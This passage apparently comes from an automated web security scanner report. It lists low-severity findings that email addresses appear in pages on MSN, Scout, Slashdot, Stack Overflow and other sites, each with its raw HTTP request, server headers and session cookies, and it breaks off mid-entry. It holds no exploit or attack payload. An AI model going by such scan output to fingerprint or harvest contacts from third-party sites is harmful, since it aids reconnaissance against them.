Connection: keep-alive
Content-Length: 105726

/*
* jQuery JavaScript Library v1.4.2
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Sizz
...[SNIP]...
<e.length;j++){k.removeAttribute(e[j].name)}k.save(d)}}}}}catch(f){}return c})()});
/*
* The MIT License
*
* Copyright (c) 2009 Øyvind Sean Kinsey, oyvind@kinsey.no
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restricti
...[SNIP]...

26.37. http://money.redacted/common/welcome-to-the-new-msn-money.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /common/welcome-to-the-new-msn-money.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /common/welcome-to-the-new-msn-money.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM05
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:11:36 GMT
Content-Length: 42711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><l
...[SNIP]...
<a href="mailto:msnmcs@microsoft.com?subject=MSN%20Money%20feedback">
...[SNIP]...

26.38. http://money.redacted/currency/2011-the-year-of-wild-speculation-fleckenstein.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /currency/2011-the-year-of-wild-speculation-fleckenstein.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /currency/2011-the-year-of-wild-speculation-fleckenstein.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:09:39 GMT
Content-Length: 99025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><l
...[SNIP]...
<a href="mailto:msnmcs@microsoft.com?subject=MSN%20Money%20feedback">
...[SNIP]...

26.39. http://money.redacted/how-to-invest/super-bowl-theory-says-to-go-long-marketwatch.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /how-to-invest/super-bowl-theory-says-to-go-long-marketwatch.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /how-to-invest/super-bowl-theory-says-to-go-long-marketwatch.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM05
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:12:11 GMT
Content-Length: 81357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><l
...[SNIP]...
<a href="mailto:msnmcs@microsoft.com?subject=MSN%20Money%20feedback">
...[SNIP]...

26.40. http://money.redacted/investing/10-reasons-to-love-rising-prices-jubak.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /investing/10-reasons-to-love-rising-prices-jubak.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /investing/10-reasons-to-love-rising-prices-jubak.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:12:18 GMT
Content-Length: 113130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><l
...[SNIP]...
<a href="mailto:msnmcs@microsoft.com?subject=MSN&#xA;%20Money%20feedback">
...[SNIP]...

26.41. http://money.redacted/mutual-fund/when-a-401k-loan-is-a-smart-move-usnews.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /mutual-fund/when-a-401k-loan-is-a-smart-move-usnews.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /mutual-fund/when-a-401k-loan-is-a-smart-move-usnews.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM06
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:09:41 GMT
Content-Length: 71646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><l
...[SNIP]...
<a href="mailto:msnmcs@microsoft.com?subject=MSN%20Money%20feedback">
...[SNIP]...

26.42. http://movies.redacted/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://movies.redacted
Path:   /paralleluniverse/5-demonic-possession-movies/story/across-the-universe/

Issue detail

The following email address was disclosed in the response:

Request

GET /paralleluniverse/5-demonic-possession-movies/story/across-the-universe/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 49419
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=2f4ba9c5a4c34145987ce8f93d87a3b5; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Parallel U
...[SNIP]...
<a href="mailto:heymsn@microsoft.com?subject=Across the Universe: Dissecting 'The Dark Knight,' Visiting 'Battle: Los Angeles' and more" class="art">heymsn@microsoft.com</a>
...[SNIP]...

26.43. http://movies.redacted/paralleluniverse/dissecting-dark-knight-villains/story/across-the-universe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://movies.redacted
Path:   /paralleluniverse/dissecting-dark-knight-villains/story/across-the-universe/

Issue detail

The following email address was disclosed in the response:

Request

GET /paralleluniverse/dissecting-dark-knight-villains/story/across-the-universe/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 52719
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=5ff4b00728d9439c8b366e737607dbdc; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Parallel U
...[SNIP]...
<a href="mailto:heymsn@microsoft.com?subject=Across the Universe: Dissecting 'The Dark Knight,' Visiting 'Battle: Los Angeles' and more" class="art">heymsn@microsoft.com</a>
...[SNIP]...

26.44. https://msnia.login.live.com/ppsecure/post.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://msnia.login.live.com
Path:   /ppsecure/post.srf

Issue detail

The following email address was disclosed in the response:

Request

GET /ppsecure/post.srf HTTP/1.1
Host: msnia.login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:14:43 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: TK2IDSMLGN1C04 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:13:43 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-0b57eae4-cbe7-4619-b132-61d19b680035; domain=login.live.com;path=/;version=1
X-Frame-Options: deny
Content-Length: 11551

<!-- ServerInfo: TK2IDSMLGN1C04 2011.01.07.23.08.26 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA045, -- Version: 9,0,16533,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
...[SNIP]...
!!!DE~Germany~49~^[1-9]{1}[0-9]{6,10}$~(1 70) 1 23 45 67~(=0, =1,) =3, =4, =6, =8!!!IT~Italy~39~^[1-9]{1}[0-9]{8,9}$~123 456 7890~=3, =6!!!JP~Japan~81~^[A-Za-z0-9_.-]+@([A-Za-z0-9_-]+\.)+[A-Za-z0-9]+$~someone@example.com~!!!MX~Mexico~52~^[1-9]{1}[0-9]{8,9}$~(425) 555-0100~(=0,) =3,-=6!!!NL~Netherlands~31~^[1-9]{1}[0-9]{5,11}$~6 123 45678~=1, =4!!!ES~Spain~34~^[1-9]{1}[0-9]{5,10}$~609 123 456~=3, =6!!!TR~Turkey~90~^[1-
...[SNIP]...

26.45. http://news.sciencemag.org/scienceinsider/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.sciencemag.org
Path:   /scienceinsider/

Issue detail

The following email address was disclosed in the response:

Request

GET /scienceinsider/ HTTP/1.1
Host: news.sciencemag.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:16:19 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.11 DAV/2
X-Powered-By: PHP/5.2.11
Connection: close
Content-Type: text/html
Content-Length: 107268

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard">


<head
...[SNIP]...
<a href="mailto:news-info@aaas.org">
...[SNIP]...

26.46. http://openchannel.msnbc.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://openchannel.msnbc.redacted
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: openchannel.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=286
Date: Sun, 30 Jan 2011 02:17:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 158591

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Open Channel</title>
<met
...[SNIP]...
<a href="mailto:bill.dedman@msnbc.com?subject=Reader idea for investigation">
...[SNIP]...
<a target="_blank" href="mailto:NewsInvestigates@nbcuni.com">
...[SNIP]...
<a href="mailto:bill.dedman@msnbc.com?subject=Reader idea for investigation">
...[SNIP]...
<a href="mailto:bill.dedman@msnbc.com?subject=Reader idea for investigation">
...[SNIP]...
<a href="mailto:bill.dedman@msnbc.com?subject=Reader idea for investigation">
...[SNIP]...
<a href="mailto:bill.dedman@msnbc.com?subject=Reader idea for investigation">
...[SNIP]...
<a href="mailto:bill.dedman@msnbc.com?subject=Reader idea for investigation">
...[SNIP]...
<a href="mailto:bill.dedman@msnbc.com?subject=Reader idea for investigation">
...[SNIP]...
<a href="mailto:bill.dedman@msnbc.com?subject=Reader idea for investigation">
...[SNIP]...

26.47. http://recruiting.scout.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://recruiting.scout.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: recruiting.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=153805115.1296350458.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=153805115.697096863.1296350458.1296350458.1296350458.1; SessionBrandId=0; __utmc=153805115; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=153805115.1.10.1296350458;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:18:16 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:28:16 GMT
Last-Modified: Sun, 30 Jan 2011 02:15:18 GMT
ETag: "1CBC02389E3FF00"
Content-Type: text/html
Content-Length: 280509

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
ed and The Sporting News and has been a featured guest on FSN Prime Ticket, FSN Northwest, The NFL Network, The MTN, Fox Sports Radio, Sporting News Radio and ESPN Radio as well. He can be reached at brandonh@scout.com and followed at twitter.com/brandonhuffman <a class="active" href="#profile-short-Huffman">
...[SNIP]...
ke Worthen has been with Scout.com since 2008. He currently works as a West Recruiting Analyst. In addition, he publishes the Washington high school site (hswashington.scout.com). He can be reached at jworthen@scout.com and followed at twitter.com/jacobworthen <a class="active" href="#profile-short-Worthen">
...[SNIP]...

26.48. http://redtape.msnbc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://redtape.msnbc.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: redtape.msnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-PhApp: oak-tp-web020
X-Webserver: oak-tp-web020
Vary: cookie
Keep-Alive: timeout=300, max=100
Content-Type: text/html; charset=utf-8
Content-Length: 39293
Date: Sun, 30 Jan 2011 02:18:20 GMT
X-Varnish: 2755478365
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <script type="text/ja
...[SNIP]...
<a href=mailto:BobSullivan@feedback.msnbc.com>
...[SNIP]...

26.49. http://rss.scout.com/rss.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.scout.com
Path:   /rss.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /rss.aspx?sid=143 HTTP/1.1
Host: rss.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Server: Scoutweb4
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Content-Type: text/xml; charset=utf-8
Content-Length: 14278
Akamai: True
Cache-Control: private, max-age=819
Date: Sun, 30 Jan 2011 02:18:29 GMT
Connection: close
Akamai: True

<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:scout="http://www.scout.com/">
<channel>
<title>Scout.com &gt; Scout.com</title>
<description>The latest news from Scout.c
...[SNIP]...
<managingEditor>info@scout.com</managingEditor>
...[SNIP]...
<webMaster>info@scout.com</webMaster>
...[SNIP]...

26.50. http://science.slashdot.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://science.slashdot.org
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: science.slashdot.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.42 (Unix) mod_perl/1.31
SLASH_LOG_DATA: shtml
X-Powered-By: Slash 2.005001
X-Bender: In the event of an emergency, my ass can be used as a flotation device.
X-XRDS-Location: http://slashdot.org/slashdot.xrds
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 82642
Date: Sun, 30 Jan 2011 02:18:39 GMT
X-Varnish: 257579542
Age: 1
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<script id="before-content" type="text/javascript">
var pageload = {
   pagemark: '490080280767515490',
   before_content: (new Date).getTime()
};
function pageload
...[SNIP]...
<a href="mailto:feedback@slashdot.org" class="btn link opt">
...[SNIP]...

26.51. https://secure.shared.live.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/js/Main_WLStrings_JS1033.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.shared.live.com
Path:   /~Live.SiteContent.ID/~15.3.21/~/~/~/~/js/Main_WLStrings_JS1033.js

Issue detail

The following email address was disclosed in the response:

Request

GET /~Live.SiteContent.ID/~15.3.21/~/~/~/~/js/Main_WLStrings_JS1033.js HTTP/1.1
Host: secure.shared.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 14 Oct 2010 02:08:56 GMT
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Expires: Wed, 01 Jan 2020 08:00:00 GMT
Date: Sat, 29 Jan 2011 23:13:40 GMT
Content-Length: 9084
Connection: close

/* Copyright (C) 2010 Microsoft Corporation */g_s["b24"]="sign in";g_s["a0"]="Cancel";g_s["a1"]="Click a Windows Live ID to sign in";g_s["a2"]="Retype your password";g_s["a3"]="Sign in with a partner
...[SNIP]...
correctly.";g_s["b25"]="Other Windows Live IDs";g_s["b52"]="Sign in with a Single use code";g_s["b54"]="Sign in with a Windows Live Hotmail ID";g_s["ii19"]="Password";g_s["ii12"]="Cancel";g_s["ii3"]="example555@hotmail.com";g_s["ii2"]="Windows Live ID:";g_s["ii13"]="Sign in with enhanced security. This may slow your browser speed.";g_s["ii14"]="Use enhanced security (SSL)";g_s["ii11"]="Sign in";g_s["ii9"]="Remember my p
...[SNIP]...
sword is incorrect. Please try again.";g_s["p21"]="Forget me";g_s["o11"]="Don't remember this Windows Live ID.";g_s["o1"]="Alert symbol";g_s["012"]="Sign-in options";g_s["y23"]="Partner ID";g_s["y3"]="example555@hotmail.com";g_s["y2"]="Windows Live ID:";g_s["y4"]="Password:";g_s["y5"]="Forgot your password?";g_s["y6"]="Messenger:";g_s["y8"]="Remember me";g_s["y10"]="Cancel";g_s["y12"]="Use enhanced security (SSL)";g_s["y
...[SNIP]...
gned in";g_s["y22"]="Please type your email address in the format yourname@example.com.";g_s["y0"]="Error symbol";g_s["y1"]="Generic Federation Error Message";g_s["dd35"]="Single use code";g_s["dd5"]="example555@hotmail.com";g_s["dd4"]="Windows Live ID:";g_s["dd6"]="Enter the code";g_s["dd7"]="Request a code";g_s["dd9"]="If you request a new single use code, the previous code won't work. Are you sure you want to refresh
...[SNIP]...

26.52. http://sstatic.net/Js/third-party/jquery.typewatch.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sstatic.net
Path:   /Js/third-party/jquery.typewatch.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Js/third-party/jquery.typewatch.js HTTP/1.1
Host: sstatic.net
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/tags
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html>
<head>
<title>Too Many Requests - Stack Overflow</title>
</head>
<body style="font-family:Arial,Helvetica,sans-serif;">
<div style="margin: 0 auto; width: 960px;">
<h
...[SNIP]...
<a href="mailto:team@stackoverflow.com">
...[SNIP]...

26.53. http://sstatic.net/Js/third-party/openid-jquery.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sstatic.net
Path:   /Js/third-party/openid-jquery.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Js/third-party/openid-jquery.js?v=7 HTTP/1.1
Host: sstatic.net
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/users/login?returnurl=%2fusers
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html>
<head>
<title>Too Many Requests - Stack Overflow</title>
</head>
<body style="font-family:Arial,Helvetica,sans-serif;">
<div style="margin: 0 auto; width: 960px;">
<h
...[SNIP]...
<a href="mailto:team@stackoverflow.com">
...[SNIP]...

26.54. http://sstatic.net/Js/wmd.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sstatic.net
Path:   /Js/wmd.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Js/wmd.js?v=508538fa9757 HTTP/1.1
Host: sstatic.net
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html>
<head>
<title>Too Many Requests - Stack Overflow</title>
</head>
<body style="font-family:Arial,Helvetica,sans-serif;">
<div style="margin: 0 auto; width: 960px;">
<h
...[SNIP]...
<a href="mailto:team@stackoverflow.com">
...[SNIP]...

26.55. http://sstatic.net/js/master.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sstatic.net
Path:   /js/master.min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/master.min.js?v=e8eb0725b4bd HTTP/1.1
Host: sstatic.net
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html>
<head>
<title>Too Many Requests - Stack Overflow</title>
</head>
<body style="font-family:Arial,Helvetica,sans-serif;">
<div style="margin: 0 auto; width: 960px;">
<h
...[SNIP]...
<a href="mailto:team@stackoverflow.com">
...[SNIP]...

26.56. http://sstatic.net/js/question.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sstatic.net
Path:   /js/question.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/question.js?v=46e26c3f9a63 HTTP/1.1
Host: sstatic.net
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html>
<head>
<title>Too Many Requests - Stack Overflow</title>
</head>
<body style="font-family:Arial,Helvetica,sans-serif;">
<div style="margin: 0 auto; width: 960px;">
<h
